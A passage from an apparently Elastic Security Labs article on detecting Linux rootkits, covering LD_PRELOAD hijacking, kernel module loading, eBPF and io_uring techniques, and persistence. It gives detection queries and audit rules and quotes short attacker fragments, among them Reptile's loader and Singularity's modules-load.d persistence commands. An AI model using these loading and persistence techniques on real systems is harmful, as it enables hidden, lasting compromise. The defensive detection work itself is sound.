(file.extension like~ &quot;so&quot; or file.name like~ &quot;*.so.*&quot;)
</code></pre>
<p>These files are often written to writable or ephemeral paths such as <code>/tmp/</code>, <code>/dev/shm/</code>, or hidden subdirectories under user home directories. Attackers may either download, compile, or drop them directly from a loader. This knowledge may be applied to the detection rule above to reduce noise.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image7.png" alt="Figure 1: Telemetry example of a shared object rootkit file creation" title="Figure 1: Telemetry example of a shared object rootkit file creation." /></p>
<p>As an example, in the telemetry shown above, we can see the threat actor using <code>scp</code> to download a shared object file into a hidden subdirectory within <code>/tmp</code>, then move it to a library directory, attempting to blend in. We detected this, and similar threats, via:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_shared_object_creation.toml">Shared Object Created by Previously Unknown Process</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/defense_evasion_hidden_shared_object.toml">Creation of Hidden Shared Object File</a></li>
</ul>
<p>Once the shared object file is present on the system, the attacker has several options for activating it. The most commonly abused mechanisms are the <code>LD_PRELOAD</code> environment variable, the <code>/etc/ld.so.preload</code> file, and dynamic linker configuration paths such as <code>/etc/ld.so.conf</code>.</p>
<p>The <code>LD_PRELOAD</code> environment variable allows an attacker to specify a shared object that will be loaded before any other libraries during the execution of a dynamically linked binary. This allows for a complete override of <code>libc</code> functions, such as <code>execve()</code>, <code>open()</code>, or <code>readdir()</code>. This method works on a per-process basis and does not require root access.</p>
<p>To detect this technique, telemetry for the <code>LD_PRELOAD</code> environment variable is required. Once this is available, any detection logic to detect uncommon <code>LD_PRELOAD</code> values can be written. For example:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.env_vars != null
</code></pre>
<p>As shown in Figure 1, this was also the next step for the attackers. The attackers moved <code>libz.so.1</code> from <code>/tmp/.X12-unix/libz.so.1</code> to <code>/usr/local/lib/libz.so.1</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image18.png" alt="Figure 2: Telemetry example of a shared object rootkit load via LD_PRELOAD" title="Figure 2: Telemetry example of a shared object rootkit load via LD_PRELOAD." /></p>
<p>To be higher fidelity, we implemented this logic using the <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/create-detection-rule#create-new-terms-rule">new_terms rule type</a>, only flagging on previously unseen shared object entries within the <code>LD_PRELOAD</code> variable via:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/defense_evasion_unusual_preload_env_vars.toml#L18">Unusual Preload Environment Variable Process Execution</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/3e9b8bcdc7c1e70705aa33d3981bae224289a549/rules/linux/defense_evasion_ld_preload_cmdline.toml">Unusual LD_PRELOAD/LD_LIBRARY_PATH Command Line Arguments</a></li>
</ul>
<p>Of course, if more than just <code>LD_PRELOAD</code> and <code>LD_LIBRARY_PATH</code> environment variables are collected, the rule above should be altered to include these two items specifically. To reduce noise, statistical analysis and/or baselining should be conducted.</p>
<p>Another method of activation is to leverage the <code>/etc/ld.so.preload</code> file. If present, this file forces the dynamic linker to inject the listed shared object into every dynamically linked binary on the system, resulting in global injection.</p>
<p>A similar method involves altering the dynamic linker’s configuration to prioritize malicious library paths. This can be achieved by modifying <code>/etc/ld.so.conf</code> or adding entries to <code>/etc/ld.so.conf.d/</code>, followed by executing <code>ldconfig</code> to update the cache. This changes the resolution path of critical libraries, such as <code>libc.so.6</code>.</p>
<p>These scenarios can be detected by monitoring the <code>/etc/ld.so.preload</code> and <code>/etc/ld.so.conf</code> files, as well as the <code>/etc/ld.so.conf.d/</code> directory for creation/modification events. Using this raw telemetry, a detection rule to flag these events can be implemented:</p>
<pre><code class="language-sql">file where event.action in (&quot;creation&quot;, &quot;rename&quot;) and
file.path like (&quot;/etc/ld.so.preload&quot;, &quot;/etc/ld.so.conf&quot;, &quot;/etc/ld.so.conf.d/*&quot;)
</code></pre>
<p>We frequently see this chain, where a shared object is created, and then the dynamic linker is modified.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image9.png" alt="Figure 3: Telemetry example of shared object creation followed by dynamic linker configuration creation" title="Figure 3: Telemetry example of shared object creation followed by dynamic linker configuration creation." /></p>
<p>Which we detect via the following detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/defense_evasion_dynamic_linker_file_creation.toml">Dynamic Linker Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml">Modification of Dynamic Linker Preload Shared Object</a></li>
</ul>
<p>Chaining these two alerts together on a single host warrants investigation.</p>
<h3>Kernel-space rootkit loading detection techniques</h3>
<p>Loading an LKM manually typically requires using built-in command-line utilities such as <code>modprobe</code>, <code>insmod</code>, and <code>kmod</code>. Detecting the execution of these utilities will detect the loading phase (when performed manually).</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (process.name == &quot;kmod&quot; and process.args == &quot;insmod&quot; and
   process.args like~ &quot;*.ko*&quot;) or
  (process.name == &quot;kmod&quot; and process.args == &quot;modprobe&quot; and
   not process.args in (&quot;-r&quot;, &quot;--remove&quot;)) or
  (process.name == &quot;insmod&quot; and process.args like~ &quot;*.ko*&quot;) or
  (process.name == &quot;modprobe&quot; and not process.args in (&quot;-r&quot;, &quot;--remove&quot;))
)
</code></pre>
<p>Many open-source rootkits are published without a loader and rely on pre-installed LKM-loading utilities. An example is <a href="https://github.com/MatheuZSecurity/Singularity">Singularity</a>, which provides a <code>load_and_persistence.sh</code> script, which performs several actions, after which it eventually calls <code>insmod &quot;$MODULE_DIR/$MODULE_NAME.ko&quot;</code>. Although <code>insmod</code> is called in the command, <code>insmod</code> is actually <code>kmod</code> under the hood, with <code>insmod</code> as a process argument. An example of a Singularity load:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image15.png" alt="Figure 4: Telemetry example of loading singularity.ko via kmod" title="Figure 4: Telemetry example of loading singularity.ko via kmod." /></p>
<p>Which can be easily detected via the following detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/persistence_insmod_kernel_module_load.toml">Kernel Module Load via Built-in Utility</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/5d5e1d9ca43c1344927a0e81302bc14cb1891a20/rules/linux/persistence_kernel_module_load_from_unusual_location.toml">Kernel Module Load from Unusual Location</a></li>
</ul>
<p>This detection approach, however, is far from bulletproof, as many rootkits rely on a loader to load the LKM, thereby bypassing execution of these userland utilities.</p>
<p>For example, <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/kernel/loader/loader.c">Reptile’s loader</a> directly invokes the <code>init_module</code> syscall with an in-memory decrypted kernel blob:</p>
<pre><code class="language-c">#define init_module(module_image, len, param_values) syscall(__NR_init_module, module_image, len, param_values)

int main(void) {
    [...]
    do_decrypt(reptile_blob, len, DECRYPT_KEY);
    module_image = malloc(len);
    memcpy(module_image, reptile_blob, len);
    init_module(module_image, len, &quot;&quot;);
    [...]
}
</code></pre>
<p>Additionally, <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/kernel/kmatryoshka/kmatryoshka.c">Reptile’s kmatryoshka module</a> acts as an in-kernel chainloader that decrypts and loads another hidden LKM using a direct function pointer to <code>sys_init_module</code>, located via <code>kallsyms_on_each_symbol()</code>. This further obscures the loading mechanism from userland visibility.</p>
<p>Because of this, it's essential to understand what these utilities do under the hood; they are merely wrappers around the <code>init_module()</code> and <code>finit_module()</code> system calls. Effective detection should therefore focus on tracing these syscalls directly, rather than the tooling that invokes them.</p>
<p>To ensure the availability of the data sources required to load LKMs, various security tools can be employed. Auditd or Auditd Manager are suitable choices. To facilitate the collection of <code>init_module()</code> and <code>finit_module</code> syscalls, the subsequent configuration can be implemented.</p>
<pre><code class="language-sql">-a always,exit -F arch=b64 -S finit_module -S init_module
-a always,exit -F arch=b32 -S finit_module -S init_module
</code></pre>
<p>Combining this raw telemetry with a detection rule that alerts when this event occurs allows for a strong defense.</p>
<pre><code class="language-sql">driver where event.action == &quot;loaded-kernel-module&quot; and
auditd.data.syscall in (&quot;init_module&quot;, &quot;finit_module&quot;)
</code></pre>
<p>This strategy will allow detection of the kernel module loading, regardless of the utility being used for the loading event. In the example below, we see a true positive detection of the <a href="https://github.com/m0nad/Diamorphine">Diamorphine</a> rootkit.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image2.png" alt="Figure 5: Telemetry example of detecting the Diamorphine load event via finit_module() syscall" title="Figure 5: Telemetry example of detecting the Diamorphine load event via finit_module() syscall." /></p>
<p>This pre-built rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_kernel_driver_load.toml">Kernel Driver Load</a></li>
</ul>
<p>Additional Linux detection engineering guidance through Auditd is presented in the <a href="https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd">Linux detection engineering with Auditd research</a>.</p>
<h4>Out-of-tree and unsigned modules</h4>
<p>Another sign of a malicious LKM is the presence of the kernel “taint” flag. When the kernel detects that a module is loaded that is either not part of the official kernel tree, lacks a valid signature, or uses a non-permissive license, it marks the kernel as “tainted”. This is a built-in integrity mechanism that indicates the kernel is in a potentially untrusted state. An example of this is shown below, where the <code>reveng_rtkit</code> module is loaded:</p>
<pre><code class="language-shell">[ 2853.023215] reveng_rtkit: loading out-of-tree module taints kernel.
[ 2853.023219] reveng_rtkit: module license 'unspecified' taints kernel.
[ 2853.023220] Disabling lock debugging due to kernel taint
[ 2853.023297] reveng_rtkit: module verification failed: signature and/or required key missing - tainting kernel
</code></pre>
<p>The kernel identifies the module as out-of-tree, with an unspecified license, and missing cryptographic verification. This results in the kernel being marked tainted.</p>
<p>To detect this behavior, system and kernel logging must be parsed and ingested. Once kernel log telemetry is available, simple pattern matching or rule-based detection can flag these events. Out-of-tree module loading can be detected through:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;loading out-of-tree module taints kernel.&quot;
</code></pre>
<p>And similar detection logic can be implemented to detect unsigned module loading:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;module verification failed: signature and/or required key missing - tainting kernel&quot;
</code></pre>
<p>Using the detection logic above, we observed true positives in telemetry, attempting to load Singularity:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image17.png" alt="Figure 6: Telemetry example of a kernel taint upon the loading of Singularity" title="Figure 6: Telemetry example of a kernel taint upon the loading of Singularity." /></p>
<p>These rules are by default available in:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_tainted_kernel_module_load.toml">Tainted Kernel Module Load</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml">Tainted Out-Of-Tree Kernel Module Load</a></li>
</ul>
<p>The log entry will always show the module name that triggered the event, enabling easy triage. When the LKM is not present in the system during a manual check triggered by this alert, it may indicate that the LKM is hiding itself.</p>
<h4>Kill signals</h4>
<p>Many (open-source) rootkits leverage <code>kill</code> signals, specifically those in the higher, unassigned ranges (32+), as covert communication channels or triggers for malicious actions. For instance, a rootkit might intercept a specific high-numbered <code>kill</code> signal (e.g., <code>kill -64 &lt;pid&gt;</code>). Upon receiving this signal, the rootkit's payload could be configured to elevate privileges, execute commands, toggle hiding capabilities, or establish a backdoor.</p>
<p>To detect this, we can leverage Auditd and create a rule that collects all kill signals:</p>
<pre><code class="language-sql">-a exit,always -F arch=b64 -S kill -k kill_rule
</code></pre>
<p>The arguments passed to <code>kill()</code> are <code>kill(pid, sig)</code>. We can query <code>a1</code> (the signal) to flag any kill signal above 32.</p>
<pre><code class="language-sql">process where event.action == &quot;killed-pid&quot; and
auditd.data.syscall == &quot;kill&quot; and auditd.data.a1 in (
&quot;21&quot;, &quot;22&quot;, &quot;23&quot;, &quot;24&quot;, &quot;25&quot;, &quot;26&quot;, &quot;27&quot;, &quot;28&quot;, &quot;29&quot;, &quot;2a&quot;,
&quot;2b&quot;, &quot;2c&quot;, &quot;2d&quot;, &quot;2e&quot;, &quot;2f&quot;, &quot;30&quot;, &quot;31&quot;, &quot;32&quot;, &quot;33&quot;, &quot;34&quot;,
&quot;35&quot;, &quot;36&quot;, &quot;37&quot;, &quot;38&quot;, &quot;39&quot;, &quot;3a&quot;, &quot;3b&quot;, &quot;3c&quot;, &quot;3d&quot;, &quot;3e&quot;,
&quot;3f&quot;, &quot;40&quot;, &quot;41&quot;, &quot;42&quot;, &quot;43&quot;, &quot;44&quot;, &quot;45&quot;, &quot;46&quot;, &quot;47&quot;
)
</code></pre>
<p>Analyzing the <code>kill()</code> syscall for unusual signal values via Auditd presents a strong detection opportunity against rootkits that utilize these signals, as seen in techniques such as those employed by Diamorphine. The kill-related pre-built rules are available at:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/defense_evasion_unsual_kill_signal.toml">Unusual Kill Signal</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/defense_evasion_kill_command_executed.toml">Kill Command Execution</a></li>
</ul>
<h4>Segfaults</h4>
<p>Finally, it’s essential to recognize that kernel-space rootkits are inherently fragile. LKMs are typically compiled for a specific kernel version and configuration. An incorrectly resolved symbol or a misaligned memory write may trigger a segmentation fault. While these failures may not immediately expose the rootkit’s functionality, they provide strong forensic signals.</p>
<p>To detect this, raw syslog collection must be enabled. From there, writing a detection rule to flag segfault messages can help identify either malicious behavior or kernel instability, both of which warrant investigation:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and message:&quot;segfault&quot;
</code></pre>
<p>This detection rule is available out-of-the-box as <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/about-building-block-rules">a building block rule</a>:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules_building_block/execution_linux_segfault.toml">Segfault Detected</a></li>
</ul>
<p>Combining syscall-level module-loading visibility with kernel taint, out-of-tree messages, kill-signal detection, and segfault alerts lays the foundation for a layered strategy to detect LKM-based rootkits.</p>
<h3>eBPF rootkits</h3>
<p>eBPF rootkits exploit the legitimate functionality of the Linux kernel’s BPF subsystem. Programs can be dynamically loaded and attached using utilities like <code>bpftool</code> or via custom loaders that abuse the <code>bpf()</code> syscalls.</p>
<p>Detecting eBPF-based rootkits requires visibility into both <code>bpf()</code> syscalls and the use of sensitive eBPF helpers. Key indicators involved include:</p>
<ul>
<li><code>bpf(BPF_MAP_CREATE, ...)</code></li>
<li><code>bpf(BPF_MAP_LOOKUP_ELEM, ...)</code></li>
<li><code>bpf(BPF_MAP_UPDATE_ELEM, ...)</code></li>
<li><code>bpf(BPF_PROG_LOAD, ...)</code></li>
<li><code>bpf(BPF_PROG_ATTACH, ...)</code></li>
</ul>
<p>Leveraging Auditd, an audit rule can be created where <code>a0</code> is leveraged to specify the specific BPF syscalls of interest:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S bpf -F a0=0 -k bpf_map_create
-a always,exit -F arch=b64 -S bpf -F a0=1 -k bpf_map_lookup_elem
-a always,exit -F arch=b64 -S bpf -F a0=2 -k bpf_map_update_elem
-a always,exit -F arch=b64 -S bpf -F a0=5 -k bpf_prog_load
-a always,exit -F arch=b64 -S bpf -F a0=8 -k bpf_prog_attach
</code></pre>
<p>These must be tuned on a per-environment basis to ensure that benign programs (e.g., EDRs or other observability tools) that leverage eBPF do not generate noise. Another important signal is the use of eBPF helper functions.</p>
<h4>The bpf_probe_write_user helper function</h4>
<p>The <code>bpf_probe_write_user</code> helper allows kernel-space eBPF programs to write directly to userland memory. Although intended for debugging, this function can be abused by rootkits.</p>
<p>Detection remains challenging, but Linux kernels commonly log the use of sensitive helpers, such as <code>bpf_probe_write_user</code>. Monitoring for these entries offers a detection opportunity, requiring raw syslog collection and specific detection rules, such as the following:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;bpf_probe_write_user&quot;
</code></pre>
<p>This rule will alert on any kernel log entry indicating the use of <code>bpf_probe_write_user</code>. While legitimate tools may occasionally invoke it, unexpected or frequent use, especially alongside suspicious process behavior, warrants investigation. Context, such as the eBPF program’s attachment point and the userland process involved, aids triage. This detection rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_bpf_probe_write_user.toml">Suspicious Usage of bpf_probe_write_user Helper</a></li>
</ul>
<p>Below are a few obvious examples of true positives detected by this logic:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image20.png" alt="Figure 7: Telemetry example of bpf_probe_write_user function call via a malicious eBPF program" title="Figure 7: Telemetry example of bpf_probe_write_user function call via a malicious eBPF program." /></p>
<p>The rule triggers on <a href="https://github.com/eeriedusk/nysm">nysm</a> (a stealthy post-exploitation container) and <a href="https://github.com/krisnova/boopkit">boopkit</a> (a Linux eBPF backdoor).</p>
<h3>io_uring rootkits</h3>
<p><a href="https://www.armosec.io/blog/io_uring-rootkit-bypasses-linux-security/">ARMO research</a> (2025) introduced a new defense evasion technique that leverages <code>io_uring</code>, a design for asynchronous I/O, to reduce observable syscall activity and bypass standard telemetry. This technique is limited to kernel versions 5.1 and above and avoids using hooks. Although the method was recently discovered by rootkit researchers, it is still actively being developed and remains relatively immature in its feature set. An example tool that leverages this technique is <a href="https://github.com/MatheuZSecurity/RingReaper">RingReaper</a>. Rootkits can batch file, network, and other I/O operations via <code>io_uring_enter()</code>. A code example is shown below.</p>
<pre><code class="language-c">struct io_uring_sqe *sqe = io_uring_get_sqe(&amp;ring);
io_uring_prep_read(sqe, fd, buf, size, offset);
io_uring_submit(&amp;ring);
</code></pre>
<p>These calls queue and submit a read request using <code>io_uring</code>, bypassing typical syscall telemetry paths.</p>
<p>Unlike syscall table hooking or <code>LD_PRELOAD</code>-based injection, <code>io_uring</code> is not a rootkit delivery mechanism itself but provides a stealthier means of interacting with the filesystem and devices post-compromise. While <code>io_uring</code> cannot directly execute binaries (due to the lack of <code>execve</code>-like capabilities), it enables malicious actions such as file creation, enumeration, and data exfiltration, while minimizing observability.</p>
<p>Detecting <code>io_uring</code>-based rootkits requires visibility into the syscalls that underpin their operation, such as <code>io_uring_setup()</code>, <code>io_uring_enter()</code>, and <code>io_uring_register()</code>.</p>
<p>While EDR solutions may struggle to capture the indirect effects of <code>io_uring</code>, Auditd can trace these syscalls directly. The following audit rule captures relevant events for analysis:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -k io_uring
-S io_uring_setup -S io_uring_enter -S io_uring_register
</code></pre>
<p>However, this only exposes the syscall usage itself, not the specific file or object being accessed. The real &quot;magic&quot; of <code>io_uring</code> occurs within userland libraries (e.g., <code>liburing</code>), making analysis of syscall arguments essential.</p>
<p>For example, monitoring <code>io_uring_enter()</code> with <code>to_submit &gt; 0</code> indicates that an I/O operation is being batched, while alternating calls with <code>min_complete &gt; 0</code> signals completion polling. Correlating with process attributes (e.g., UID=0, unusual paths such as <code>/dev/shm</code>, <code>/tmp</code>, or <code>tmpfs</code>-backed locations) enhances detection efficacy.</p>
<p>A practical method for tracing <code>io_uring</code> activity is via eBPF with tools like <code>BCC</code>, targeting tracepoints such as <code>sys_enter_io_uring_enter</code>. This allows analysts to monitor process behavior and active file descriptors during <code>io_uring</code> operations:</p>
<pre><code class="language-c">tracepoint:syscalls:sys_enter_io_uring_enter
{
    printf(&quot;\nPID %d (%s) called io_uring_enter with fd=%d, to_submit=%d, min_complete=%d, flags=%d\n&quot;,
        pid, comm, args-&gt;fd, args-&gt;to_submit, args-&gt;min_complete, args-&gt;flags);

    printf(&quot;Manually inspect with: ls -l /proc/%d/fd\n&quot;, pid);
}
</code></pre>
<p>To illustrate this, several techniques introduced by RingReaper were tested. Live tracing reveals the file descriptors in use, helping identify suspicious activity like reading from <code>/run/utmp</code> to detect what users are logged in:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image16.png" alt="Figure 8: RingReaper users' command" title="Figure 8: RingReaper users' command." /></p>
<p>The activity of writing to a file, in this example <code>/root/test</code>:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image1.png" alt="Figure 9: RingReaper put command" title="Figure 9: RingReaper put command." /></p>
<p>Or listing process information via <code>ps</code> by reading the <code>comm</code> contents for each active PID:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image6.png" alt="Figure 10: RingReaper ps command" title="Figure 10: RingReaper ps command." /></p>
<p>While syscall monitoring exposes <code>io_uring</code> usage, it does not directly reveal the nature of the I/O without additional correlation. <code>io_uring</code> is a relatively new technique and therefore still stealthy; however, it also has several limitations. <code>io_uring</code> cannot directly execute code; however, attackers may abuse file writes (e.g., cron jobs, udev rules) to achieve delayed or indirect execution, as demonstrated by persistence techniques used by the Reptile and <a href="https://www.levelblue.com/blogs/spiderlabs-blog/unveiling-sedexp/">Sedexp</a> malware families.</p>
<h3>Rootkit persistence techniques</h3>
<p>Rootkits, whether in userland or kernel space, require some form of persistence to remain functional across reboots or user sessions. The methods vary depending on the type and privileges of the rootkit, but commonly involve abusing configuration files, service management, or system initialization scripts.</p>
<h4>Userland rootkits – environment variable persistence</h4>
<p>When using <code>LD_PRELOAD</code> to activate a userland rootkit, the behavior is not persistent by default. To achieve persistence, attackers may modify shell initialization files (e.g., <code>~/.bashrc</code>, <code>~/.zshrc</code>, or <code>/etc/profile</code>) to export environment variables such as <code>LD_PRELOAD</code> or <code>LD_LIBRARY_PATH</code>. These modifications ensure that every new shell session automatically inherits the environment required to activate the rootkit. Notably, these files exist for both user and root contexts. Therefore, even non-privileged users can introduce persistence that hijacks execution flow at their privilege level.</p>
<p>To detect this, a rule similar to the one displayed below can be used:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  // system-wide configurations
  &quot;/etc/profile&quot;, &quot;/etc/profile.d/*&quot;, &quot;/etc/bash.bashrc&quot;,
  &quot;/etc/bash.bash_logout&quot;, &quot;/etc/zsh/*&quot;, &quot;/etc/csh.cshrc&quot;,
  &quot;/etc/csh.login&quot;, &quot;/etc/fish/config.fish&quot;, &quot;/etc/ksh.kshrc&quot;,

  // root and user configurations
  &quot;/home/*/.profile&quot;, &quot;/home/*/.bashrc&quot;, &quot;/home/*/.bash_login&quot;,
  &quot;/home/*/.bash_logout&quot;, &quot;/home/*/.bash_profile&quot;, &quot;/root/.profile&quot;,
  &quot;/root/.bashrc&quot;, &quot;/root/.bash_login&quot;, &quot;/root/.bash_logout&quot;,
  &quot;/root/.bash_profile&quot;, &quot;/root/.bash_aliases&quot;, &quot;/home/*/.bash_aliases&quot;,
  &quot;/home/*/.zprofile&quot;, &quot;/home/*/.zshrc&quot;, &quot;/root/.zprofile&quot;, &quot;/root/.zshrc&quot;,
  &quot;/home/*/.cshrc&quot;, &quot;/home/*/.login&quot;, &quot;/home/*/.logout&quot;, &quot;/root/.cshrc&quot;,
  &quot;/root/.login&quot;, &quot;/root/.logout&quot;, &quot;/home/*/.config/fish/config.fish&quot;,
  &quot;/root/.config/fish/config.fish&quot;, &quot;/home/*/.kshrc&quot;, &quot;/root/.kshrc&quot;
)
</code></pre>
<p>Depending on the environment, several of these shells may not be in use, and a more tailored detection rule may be created, focusing only on <code>bash</code> or <code>zsh</code>, for example. The full detection logic using Elastic Defend and <a href="https://www.elastic.co/docs/reference/integrations/fim">Elastic’s File Integrity Monitoring integration</a> can be found here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_shell_configuration_modification.toml">Shell Configuration Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<p>For more information, a full breakdown of this persistence technique, including several other ways to detect its abuse, is presented in <a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms#t1546004---event-triggered-execution-unix-shell-configuration-modification">Linux Detection Engineering - A primer on persistence mechanisms</a>.</p>
<h4>Userland rootkits – configuration-based persistence</h4>
<p>Modifying the <code>/etc/ld.so.preload</code>, <code>/etc/ld.so.conf</code>, or the <code>/etc/ld.so.conf.d/</code> configuration files allow rootkits to persist globally across users and sessions (more information on this persistence vector is available in <a href="https://www.elastic.co/security-labs/continuation-on-persistence-mechanisms#t1574006---hijack-execution-flow-dynamic-linker-hijacking">Linux Detection Engineering - A Continuation on Persistence Mechanisms</a>). Once written, the dynamic linker will continue injecting the malicious shared object unless these configurations are explicitly reverted. These methods are persistent by design. Detection strategies mirror those described in the previous section and rely on monitoring file creation or modification events in these paths.</p>
<h4>Kernel-space rootkits – LKM persistence</h4>
<p>Similar to userland rootkits, LKMs are not persistent by default. An attacker must explicitly configure the system to reload the malicious module on boot. This is typically achieved by leveraging legitimate kernel module loading mechanisms:</p>
<p><strong>Modules file: <code>modules</code></strong></p>
<p>This file lists kernel modules that should be loaded automatically during system startup. Adding a malicious <code>.ko</code> filename here ensures that <code>modprobe</code> will load it upon boot. This file is located at <code>/etc/modules</code>.</p>
<p><strong>Configuration directory for <code>modprobe</code></strong></p>
<p>This directory contains configuration files for the <code>modprobe</code> utility. Attackers may use aliasing to disguise their rootkit or autoload it when a specific kernel event occurs (e.g., when a device is probed). These modprobe configuration files are located at <code>/etc/modprobe.d/</code>, <code>/run/modprobe.d/</code>, <code>/usr/local/lib/modprobe.d/</code>, <code>/usr/lib/modprobe.d/</code>, and <code>/lib/modprobe.d/</code>.</p>
<p><strong>Configure kernel modules to load at boot: <code>modules-load.d</code></strong></p>
<p>These configuration files specify which modules to load early in the boot process and are located at <code>/etc/modules-load.d/</code>, <code>/run/modules-load.d/</code>, <code>/usr/local/lib/modules-load.d/</code>, and <code>/usr/lib/modules-load.d/</code>.</p>
<p>To detect all of the persistence techniques listed above, a detection rule similar to the one below can be created:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  &quot;/etc/modules&quot;,
  &quot;/etc/modprobe.d/*&quot;,
  &quot;/run/modprobe.d/*&quot;,
  &quot;/usr/local/lib/modprobe.d/*&quot;,
  &quot;/usr/lib/modprobe.d/*&quot;,
  &quot;/lib/modprobe.d/*&quot;,
  &quot;/etc/modules-load.d/*&quot;,
  &quot;/run/modules-load.d/*&quot;,
  &quot;/usr/local/lib/modules-load.d/*&quot;,
  &quot;/usr/lib/modules-load.d/*&quot;
)
</code></pre>
<p>This pre-built rule that combines all of the paths listed above into a single detection rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_lkm_configuration_file_creation.toml">Loadable Kernel Module Configuration File Creation</a></li>
</ul>
<p>An example of a rootkit that automatically deploys persistence using this method is Singularity. Within its deployment, the following commands are executed:</p>
<pre><code class="language-shell">read -p &quot;Enter the module name (without .ko): &quot; MODULE_NAME
CONF_DIR=&quot;/etc/modules-load.d&quot;
mkdir -p &quot;$CONF_DIR&quot;
echo &quot;[*] Setting up persistence...&quot;
echo &quot;$MODULE_NAME&quot; &gt; &quot;$CONF_DIR/$MODULE_NAME.conf&quot;
</code></pre>
<p>By default, this means that <code>singularity.conf</code> will be created as a new entry under <code>/etc/modules-load.d/</code>. Looking at telemetry, we detect this technique simply by monitoring for new file creations:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image19.png" alt="Figure 11: Telemetry example of Singularity’s LKM persistence technique" title="Figure 11: Telemetry example of Singularity’s LKM persistence technique." /></p>
<p>These directories are also used for benign LKMs and will therefore be prone to false positives. Another persistence method involves using a trigger- or schedule-based technique to load the kernel module by executing the loader.</p>
<h4>Udev-based persistence – Reptile example</h4>
<p>A less common but powerful persistence method involves abusing udev, the Linux device manager that handles dynamic device events. Udev executes rule-based scripts when specific conditions are met. A full breakdown of this technique is presented in <a href="https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms">Linux Detection Engineering - A Sequel on Persistence Mechanisms</a>. The <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/scripts/rule">Reptile rootkit</a> demonstrates this technique by installing a malicious udev rule under <code>/etc/udev/rules.d/</code>:</p>
